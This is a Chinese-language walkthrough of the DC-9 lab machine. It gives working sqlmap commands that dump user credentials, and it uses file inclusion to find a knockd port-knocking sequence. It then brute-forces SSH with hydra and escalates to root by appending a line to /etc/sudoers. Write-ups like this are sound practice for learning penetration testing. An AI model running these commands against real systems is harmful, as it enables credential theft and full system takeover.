【DC系列09】DC-9靶机复盘

【DC系列09】DC-9靶机复盘

同样我们对这个靶机进行一个扫描，先找到ip地址。

然后再单独对这个ip地址进行扫描，发现打开了22端口和80端口，但是我们现在不能访问22端口。

这里我们搜索以下，网址没有明显变化就是post请求，所以猜测是有数据库的。

抓包看以下，发现的确是有post请求。

对数据库进行一个扫描，发现有两个数据库，第一个是默认带的。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=2' --dbs --batch

先扫描了一下user数据库，发现里面有一个表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users --tables --batch

提取一下表中的列，发现有username和password.

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails --columns --batch

把用户名和密码提取出来，sqlman专门帮我们保存到了一个csv文件中去了。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D users -T UserDetails -C 'username,password' --dump

对用户名和密码进行一个单独的保存，方便等会的爆破。

cat /root/.local/share/sqlmap/output/192.168.102.151/dump/users/UserDetails.csv|awk -F, '{print $1}' > pass

再看看Staff数据库，发现里面有一个Users表。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff --tables --batch

发现这个表中也有一个账号密码。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users --columns

发现用户名是admin，密码是一个md5，不出以为这应该就是网站后台登陆账户。

sqlmap -u 'http://192.168.102.151/results.php' --data 'search=1' -D Staff -T Users -C 'Username,Password' --dump --batch

破解一下md5，密码就出来了。

后台登陆一下，发现成功登陆了上去。

只多了一个Add Record菜单，我们提交一些数据。

发现下面file does not exist，所以猜测这里面有个文件包含漏洞。

尝试了以下发现果然有一个文件包含。

/proc/sched_debug是一个Linux内核中的虚拟文件，文件包含了一个完整的调度器状态快照，包括所有运行的进程及它们的状态、进程的调度策略、调度队列、调度器的负载平衡状态等。

我们发现了knockd的进程，knockd是一个守护进程，它在后台运行，并等待接收预定义的端口序列。当它接收到正确的端口序列时，它会执行预定义的安全操作。这个过程类似于“敲门”，因此它被称为knockd。

我们查看一下这个进程文件，发现里面是有三个参数，意思就是，当SSH按照这个顺序收到三个syn包后，ssh才可以开启。

利用knock工具我们可以向目标主机发送三个syn包，再用nmap扫描一下，发现22端口开启了。

这时候我们利用hyrad爆破以下ssh，用户名和密码字典就是我们sqlmap在数据库中找到的，发现有三个用户。

经过尝试只有第三个里面有点利用东西，第一个第二个没找到线索。

第三个用户登陆进去后ls -al发现一个隐藏目录，进去后发现有一个密码字典。

把新发现的字典在爆破一下，发现了两个新的用户。

登陆上fredf用户，sudo -l发现fredf用户可以免密使用root权限的文件有一个。

这里面的意思就是这个命令有两个参数，打开第一个文件，追加到第二个文件中去。

既然是root权限，我们就可以提升我们这个用户的权限为ALL，和root用户权限是一样的，

把这个命令先写到一个文件中去。然后利用test命令追加到/etc/sudoers中去。

fredf ALL=(ALL:ALL) ALL

然后sudo su -提升下自己的权限就可以了